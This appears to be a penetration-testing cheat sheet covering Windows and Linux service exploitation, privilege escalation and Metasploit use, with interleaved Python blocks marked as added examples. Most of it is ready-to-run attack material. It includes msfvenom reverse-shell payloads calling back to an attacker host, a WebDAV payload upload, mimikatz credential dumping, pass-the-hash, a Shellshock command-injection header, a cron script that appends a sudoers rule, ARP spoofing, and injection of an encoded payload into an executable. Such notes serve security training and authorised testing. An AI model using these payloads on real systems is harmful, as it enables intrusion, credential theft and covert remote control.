Host Pentes

This document summarizes techniques for exploiting frequently targeted Windows and Linux services and systems. It covers exploiting services like IIS, SMB, RDP, and WinRM on Windows as well as Apache, Samba, and SSH on Linux. It also details post-exploitation techniques like privilege escalation, credential dumping, and payload delivery on both platforms. Network analysis tools like tcpdump and tshark are also summarized along with integrating exploitation and post-exploitation into the Metasploit framework.

Uploaded by

Togrul Asgerli

Frequently exploited Windows services

Microsoft IIS
WebDAV
SMB/CIFS
RDP
WinRM

Microsoft IIS and WebDAV exploiting techniques

Tools: davtest, cadaver
nmap -sV -p 80 --script=http-enum $IP (enumerating WebDAV)
hydra -L userlists -P passlists $IP http-get /webdav/ (brute-forcing WebDAV credentials)
davtest -auth bob:password_12121 -url http://$IP/webdav/ (testing which file types can be uploaded and executed)
cadaver http://$IP/webdav (connecting to WebDAV)

Exploiting with Metasploit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$Local_IP LPORT=4444 -f asp > payload.asp (creating a reverse payload with msfvenom)
Upload this file to WebDAV with cadaver (put payload.asp), then request it from the server so IIS executes it
msfconsole > use multi/handler > set payload windows/meterpreter/reverse_tcp > set LHOST > set LPORT > run
Microsoft SMB exploiting techniques
User authentication
Share authentication
Tools: PsExec (remote command execution, a telnet-like alternative), Impacket psexec.py, Metasploit
psexec.py username@$IP cmd.exe
nmap -sV -p 445 --script=smb-vuln-ms17-010 $IP (EternalBlue vulnerability check)
RDP exploiting techniques
Tools: Metasploit framework, hydra
auxiliary/scanner/rdp/rdp_scanner (confirming RDP is listening and fingerprinting it)
xfreerdp /u:username /p:password /v:$IP:$Port
BlueKeep vulnerability (CVE-2019-0708, pre-auth RCE in the RDP service)

WinRM exploiting techniques

Tools: crackmapexec, evil-winrm (getting a shell from the environment), Metasploit
crackmapexec winrm $IP -u username -p wordlist (brute-forcing WinRM credentials)
crackmapexec winrm $IP -u username -p password -x command (executing a command on the target system)
evil-winrm -u username -p password -i $IP (accessing the target system)

Windows privilege escalation techniques

Kernel exploits
Tools: Windows Exploit Suggester, SecWiki windows-kernel-exploits, Metasploit
getuid, getprivs, getsystem (meterpreter: current user, its privileges, try the built-in SYSTEM escalation)
use post/multi/recon/local_exploit_suggester
set SESSION num
run
UAC (User Account Control) bypass
Tools: UACME
pgrep explorer
migrate $ID (move into explorer.exe, a process in the user's interactive session)
net localgroup administrators (confirm the user is a local admin; UAC bypass only helps for admins running in a filtered token)
msfvenom -p windows/meterpreter/reverse_tcp lhost=$IP lport=$Port -f exe > backdoor.exe
Access token impersonation
Impersonate-level token
Delegate-level token
SeAssignPrimaryTokenPrivilege
SeCreateTokenPrivilege
SeImpersonatePrivilege
Tools: incognito (meterpreter extension)
load incognito
list_tokens -u
impersonate_token "USERNAME"

Windows credential dumping techniques

Unattended Windows setup files (may hold local admin passwords, usually base64-encoded): C:\Windows\Panther\Unattend.xml, C:\Windows\Panther\Autounattend.xml
certutil -urlcache -f $URL $FILE (downloading a file from cmd)
search -f Unattend.xml (searching for the file in meterpreter)
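Once Unattend.xml is found, the passwords in it still have to be decoded. The parser below is an added example (not from the original notes): it walks the AutoLogon and LocalAccount blocks and decodes the Value field the way Windows SIM encodes it, base64 over UTF-16LE with the literal word "Password" appended. The sample file and its accounts are constructed for the demo.

```python
import base64
import xml.etree.ElementTree as ET


def _local(tag: str) -> str:
    """Drop the '{urn:schemas-microsoft-com:unattend}' namespace prefix ElementTree adds."""
    return tag.rsplit("}", 1)[-1]


def decode_unattend_password(value: str, plaintext: bool) -> str:
    """Windows SIM stores non-plaintext passwords as base64(UTF-16LE(password + "Password"))."""
    if plaintext:
        return value
    text = base64.b64decode(value).decode("utf-16-le")
    return text[: -len("Password")] if text.endswith("Password") else text


def extract_unattend_creds(xml_text: str):
    """Return (account, password) pairs from AutoLogon and LocalAccount blocks."""
    root = ET.fromstring(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    creds = []
    for pw in root.iter():
        if _local(pw.tag) != "Password":
            continue
        fields = {_local(c.tag): (c.text or "").strip() for c in pw}
        if "Value" not in fields:
            continue
        plaintext = fields.get("PlainText", "true").lower() == "true"
        owner = parents.get(pw)
        account = "?"
        if owner is not None:
            account = next((c.text for c in owner if _local(c.tag) in ("Username", "Name")), "?")
        creds.append((account, decode_unattend_password(fields["Value"], plaintext)))
    return creds


# Constructed sample (not a real file); the encoded value is built the way Windows SIM does it.
_AUTOLOGON_B64 = base64.b64encode("Winter2024!Password".encode("utf-16-le")).decode()
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
      <AutoLogon>
        <Password><Value>{_AUTOLOGON_B64}</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts><LocalAccounts><LocalAccount>
        <Password><Value>Summer2024!</Value><PlainText>true</PlainText></Password>
        <Name>svc_backup</Name><Group>Administrators</Group>
      </LocalAccount></LocalAccounts></UserAccounts>
    </component>
  </settings>
</unattend>"""

if __name__ == "__main__":
    for account, password in extract_unattend_creds(SAMPLE_UNATTEND):
        print(f"{account}: {password}")
```

Run it against a downloaded Unattend.xml by reading the file into extract_unattend_creds; a PlainText of true means the value is used as-is.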
Dumping credentials with mimikatz
load kiwi (meterpreter's built-in mimikatz extension)
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe (or run the standalone binary on the target)
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonpasswords
Pass-the-Hash attacks
Get the NT hashes with kiwi (lsadump::sam) or hashdump
search smb psexec (exploit/windows/smb/psexec accepts the LM:NT hash as SMBPass in place of a password)
Exploiting Linux services
Frequently exploited Linux services: Apache web server, SSH, FTP, Samba

Exploiting Apache (Shellshock vulnerability, CVE-2014-6271, through a CGI script)

nmap -sV $IP --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd' (the CGI handler exports the header as an environment variable; vulnerable bash parses the function definition and then runs the trailing command)
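The same pattern that makes the header work is what IDS rules key on: a bash function definition "() {" in a header value. The block below is an added example (not from the original notes) that builds the User-Agent value above for an arbitrary command and then runs the matching detection over a few Apache combined-log lines constructed for the demo.

```python
import re

# A Shellshock probe is a bash function definition followed by a command, sent in any
# header the CGI handler exports as an environment variable (User-Agent, Referer, Cookie).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def shellshock_header(command: str) -> str:
    """User-Agent value as in the note above; the two echo's emit the blank line that
    terminates the CGI headers so the command output is not dropped by the server."""
    return "() { :; }; echo; echo; /bin/bash -c '%s'" % command


def is_shellshock_probe(value: str) -> bool:
    return bool(SHELLSHOCK_RE.search(value))


# Constructed Apache combined-log lines (not real traffic); User-Agent is the last quoted field.
SAMPLE_LOG = r'''
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /gettime.cgi HTTP/1.1" 200 83 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
10.0.0.6 - - [12/Mar/2024:10:01:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.7 - - [12/Mar/2024:10:02:44 +0000] "GET /cgi-bin/status HTTP/1.0" 500 0 "-" "() {:;};/usr/bin/id"
'''.strip("\n")

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"$')


def find_probes(log_text: str):
    """Return (source ip, requested path) for every line whose User-Agent carries a probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_shellshock_probe(m.group("ua")):
            hits.append((m.group("ip"), m.group("req").split()[1]))
    return hits


if __name__ == "__main__":
    print(shellshock_header("id"))
    print(find_probes(SAMPLE_LOG))
```

The detector deliberately tolerates the whitespace-free variant "() {:;};" that scanners use to dodge naive string matches.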
Exploiting the Linux Samba service
Tools: enum4linux, smbclient, hydra, smbmap
smbmap -H $IP -u username -p password (listing shares and their permissions)
smbclient -L $IP -U username (listing shares)
enum4linux -a $IP (all enumeration: users, shares, groups, password policy)
Linux privilege escalation

Escalation with cron jobs

cd /
grep -rnw /usr -e "/home/student/message" (finding the script a root cron job runs that references a file the low-privileged user can write)
printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > cronjobs (replacing the script body; when cron runs it as root the sudoers rule is appended and student gets passwordless sudo)
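The grep above is the manual version of a general check: for every job the system crontab runs as root, list the absolute paths in the command and in the script it runs, and flag any the unprivileged user can write. The block below is an added example (not from the original notes) that does this against a staged directory tree constructed for the demo; the crontab text, the cleanup.sh script and the /home/student/message file are all made up.

```python
import os
import re
import stat
import tempfile

# system crontab lines: five time fields (or @reboot/@daily ...), a user, then the command
CRON_LINE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")
# absolute paths inside a command or a script body
PATH_RE = re.compile(r"(?<![\w.-])/[\w./-]+")


def parse_system_crontab(text: str):
    """Yield (user, command) for /etc/crontab and /etc/cron.d style files."""
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or a VAR=value assignment
        m = CRON_LINE.match(line)
        if m:
            yield m.group("user"), m.group("cmd")


def world_writable(path: str) -> bool:
    """Mode-bit check so the result is the same whoever runs it; on a real box also test
    os.access(path, os.W_OK) as the low-privileged user to catch group-writable files."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False


def find_cron_escalations(crontab_text: str, root: str = "/"):
    """Return (user, command, writable_path) for root jobs that touch a writable file.
    `root` is prefixed to every path so the check can run against a staged tree."""
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        candidates = set(PATH_RE.findall(cmd))
        for p in list(candidates):  # follow into the script and collect the paths it uses
            real = os.path.join(root, p.lstrip("/"))
            if os.path.isfile(real) and os.access(real, os.R_OK):
                with open(real, errors="replace") as fh:
                    candidates.update(PATH_RE.findall(fh.read()))
        for p in sorted(candidates):
            if world_writable(os.path.join(root, p.lstrip("/"))):
                findings.append((user, cmd, p))
    return findings


SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user  command
* * * * * root /usr/local/bin/cleanup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@daily student /home/student/backup.sh
"""


def stage_demo_tree() -> str:
    """Constructed tree: the root job runs cleanup.sh, which reads a file under the
    student's home that is world-writable. Returns the temporary root directory."""
    root = tempfile.mkdtemp()
    bin_dir = os.path.join(root, "usr/local/bin")
    home = os.path.join(root, "home/student")
    os.makedirs(bin_dir)
    os.makedirs(home)
    script = os.path.join(bin_dir, "cleanup.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\n# constructed sample\ncat /home/student/message > /tmp/notice\n")
    os.chmod(script, 0o755)  # root-owned script itself is not writable
    msg = os.path.join(home, "message")
    with open(msg, "w") as fh:
        fh.write("hello\n")
    os.chmod(msg, 0o666)  # the escalation point
    return root


if __name__ == "__main__":
    for hit in find_cron_escalations(SAMPLE_CRONTAB, stage_demo_tree()):
        print(hit)
```

On a real host run it with the contents of /etc/crontab and each file in /etc/cron.d and the default root; a hit on a file that the script executes or sources (rather than only reads, as here) is what the printf payload above exploits.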
Network-based attacks
Types: ARP, DHCP, SMB, FTP, Telnet, SSH
nmap $IP/subnet -sn (host discovery only, no port scan)
tshark
tshark -r $File -z io,phs -q (protocol hierarchy)
tshark -r $File -Y 'http' (filtering HTTP traffic)
tshark -r $File -Y 'ip.src==$ip && ip.dst==$ip' (filtering based on IP)

tshark -r $File -Y 'http.request.method==GET' (filtering GET requests)

tshark -r $File -Y 'http.request.method==GET' -Tfields -e frame.time -e ip.src -e http.request.full_uri (adding fields to the output)
tshark -r $File -Y 'http contains password' (finding "password" anywhere in an HTTP packet, headers or body; the match is case-sensitive)
Other useful filters: http.host, http.cookie, ip contains amazon.in, http.user_agent
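To make the tshark fields concrete, the block below is an added example (not from the original notes) that reproduces the three filters above by hand: it builds a small pcap in memory (constructed traffic, the hosts and URIs are made up), walks Ethernet/IPv4/TCP, and reports frame time, ip.src, ip.dst, the method and http.request.full_uri, optionally restricted to one method or to packets containing a byte string, which is what 'http contains password' does.

```python
import re
import struct


def _ip4(addr: str) -> bytes:
    return bytes(int(x) for x in addr.split("."))


def build_frame(src, dst, sport, dport, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP frame around payload; checksums are left zero (never verified here)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, _ip4(src), _ip4(dst)) + tcp
    return b"\x02" * 6 + b"\x04" * 6 + b"\x08\x00" + ip


def build_pcap(records) -> bytes:
    """records: (ts_sec, frame) pairs -> classic pcap, little-endian, link type 1 (Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for ts, fr in records:
        out += struct.pack("<IIII", ts, 0, len(fr), len(fr)) + fr
    return out


def read_pcap(data: bytes):
    """Yield (ts_sec, frame) from a classic pcap of either byte order."""
    (magic,) = struct.unpack("<I", data[:4])
    e = "<" if magic == 0xA1B2C3D4 else ">"
    pos = 24
    while pos + 16 <= len(data):
        ts, _usec, incl, _orig = struct.unpack(e + "IIII", data[pos:pos + 16])
        pos += 16
        yield ts, data[pos:pos + incl]
        pos += incl


REQ_LINE = re.compile(rb"^(GET|POST|PUT|HEAD|DELETE) (\S+) HTTP/1\.[01]\r\n")


def http_requests(pcap_bytes: bytes, method=None, needle=None):
    """(frame.time, ip.src, ip.dst, method, http.request.full_uri) for each HTTP request."""
    rows = []
    for ts, fr in read_pcap(pcap_bytes):
        if len(fr) < 34 or fr[12:14] != b"\x08\x00" or fr[23] != 6:
            continue  # not IPv4 over Ethernet, or not TCP
        ihl = (fr[14] & 0x0F) * 4
        (total,) = struct.unpack("!H", fr[16:18])
        src = ".".join(map(str, fr[26:30]))
        dst = ".".join(map(str, fr[30:34]))
        tcp = fr[14 + ihl:14 + total]
        payload = tcp[(tcp[12] >> 4) * 4:]
        m = REQ_LINE.match(payload)
        if not m or (method and m.group(1) != method.encode()):
            continue
        if needle and needle.encode() not in payload:
            continue  # the 'contains' filter: raw bytes, case-sensitive, headers and body alike
        head = payload.split(b"\r\n\r\n", 1)[0].decode("latin-1")
        host = next((l.split(":", 1)[1].strip() for l in head.split("\r\n")[1:]
                     if l.lower().startswith("host:")), dst)
        rows.append((ts, src, dst, m.group(1).decode(), f"http://{host}{m.group(2).decode()}"))
    return rows


# Constructed capture: a login page fetch, the credential POST, an SSH banner, one more GET.
SAMPLE_PCAP = build_pcap([
    (1710237600, build_frame("10.100.13.37", "93.184.216.34", 50512, 80,
        b"GET /login HTTP/1.1\r\nHost: shop.example.com\r\nUser-Agent: curl/8.0\r\n\r\n")),
    (1710237601, build_frame("10.100.13.37", "93.184.216.34", 50512, 80,
        b"POST /login HTTP/1.1\r\nHost: shop.example.com\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 29\r\n\r\n"
        b"user=bob&password=Winter2024!")),
    (1710237602, build_frame("10.100.13.36", "10.100.13.1", 40000, 22, b"SSH-2.0-OpenSSH_9.6\r\n")),
    (1710237603, build_frame("10.100.13.36", "93.184.216.34", 40001, 80,
        b"GET /api/items?q=x HTTP/1.1\r\nHost: shop.example.com\r\n\r\n")),
])

if __name__ == "__main__":
    for row in http_requests(SAMPLE_PCAP, needle="password"):
        print(row)
```

Feed a real file with open(path, "rb").read(); requests split across TCP segments are not reassembled here, which tshark does for you.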
ARP spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward (forward the victims' traffic so their connections keep working)
arpspoof -i eth1 -t 10.100.13.37 -r 10.100.13.36 (poison both directions between the two hosts)
Wi-Fi traffic analysis

Importing nmap results into Metasploit

Use the -oX flag to save the nmap scan as an XML file.
db_import $filename
hosts
services
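db_import is just a parser for that XML, so it helps to know what it pulls out. The block below is an added example (not from the original notes or from Metasploit's own importer) that reads -oX output and produces the two tables msfconsole shows as hosts and services: up hosts with their IPv4 address and PTR name, and open ports with the service name and version string. The XML is constructed for the demo.

```python
import xml.etree.ElementTree as ET

# Constructed output in the shape `nmap -sV -oX scan.xml` writes (hosts and ports are made up).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.100.13.0/24" start="1710237600" version="7.94">
  <host><status state="up"/>
    <address addr="10.100.13.37" addrtype="ipv4"/>
    <address addr="00:0C:29:AA:BB:CC" addrtype="mac"/>
    <hostnames><hostname name="win-web" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Microsoft IIS httpd" version="7.5"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="10.100.13.36" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="10.100.13.40" addrtype="ipv4"/></host>
</nmaprun>"""


def import_nmap(xml_text: str):
    """Return (hosts, services) like msfconsole's `hosts` and `services` after db_import."""
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for h in root.findall("host"):
        if h.find("status").get("state") != "up":
            continue  # down hosts are not recorded
        addr = next(a.get("addr") for a in h.findall("address") if a.get("addrtype") == "ipv4")
        hn = h.find("hostnames/hostname")
        hosts.append({"address": addr, "name": hn.get("name") if hn is not None else ""})
        for p in h.findall("ports/port"):
            if p.find("state").get("state") != "open":
                continue
            svc = p.find("service")
            name = svc.get("name") if svc is not None else ""
            info = " ".join(x for x in (svc.get("product"), svc.get("version")) if x) if svc is not None else ""
            services.append({"host": addr, "port": int(p.get("portid")), "proto": p.get("protocol"),
                             "name": name, "info": info})
    return hosts, services


def targets_for(services, name: str):
    """The equivalent of `services -S name`: host:port strings to feed RHOSTS."""
    return [f"{s['host']}:{s['port']}" for s in services if s["name"] == name]


if __name__ == "__main__":
    hosts, services = import_nmap(SAMPLE_NMAP_XML)
    for s in services:
        print(f"{s['host']:<14} {s['port']:<6} {s['proto']:<4} {s['name']:<14} {s['info']}")
    print(targets_for(services, "http"))
```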
Metasploit auxiliary modules
run autoroute -s $IP (pivoting: route the subnet through the current session)
udp_sweep
search type:auxiliary name:ftp
http_version, http_header, robots_txt, dir_scanner, files_dir, http_login, apache_userdir_enum
mysql_enum, mysql_version, mysql_sql
ssh_enumusers
db_autopwn (removed from current Metasploit releases), analyze, vulns
load wmap, wmap_sites -a $IP
Generating payloads with msfvenom
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -f exe > payload64.exe
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -f exe > payload86.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -f elf > payload64
Encoding payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -e x86/shikata_ga_nai -f exe > encodex86.exe
-i 10 (10 encoding iterations)
Injecting a payload into a portable executable
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -e x86/shikata_ga_nai -i 10 -f exe -k -x $PathofPE > encodex86.exe
-k (keep the original functionality of the PE)
Automating Metasploit with resource scripts
vim handler.rc
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $IP
set LPORT $PORT
run
(save)
msfconsole -r handler.rc
vim portscan.rc
use auxiliary/scanner/portscan/tcp
set RHOSTS $IP
run
(save)
msfconsole -r portscan.rc
resource $pathofscript (running a resource script from inside msfconsole)
